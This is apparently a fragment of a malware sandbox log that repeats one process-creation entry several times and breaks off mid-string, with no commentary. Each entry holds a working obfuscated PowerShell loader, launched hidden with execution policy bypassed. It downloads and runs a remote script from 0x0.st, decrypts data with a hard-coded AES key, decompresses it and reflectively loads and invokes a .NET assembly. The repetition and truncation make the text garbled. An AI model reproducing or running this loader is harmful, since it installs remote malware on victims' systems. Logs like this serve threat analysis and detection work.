ZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVU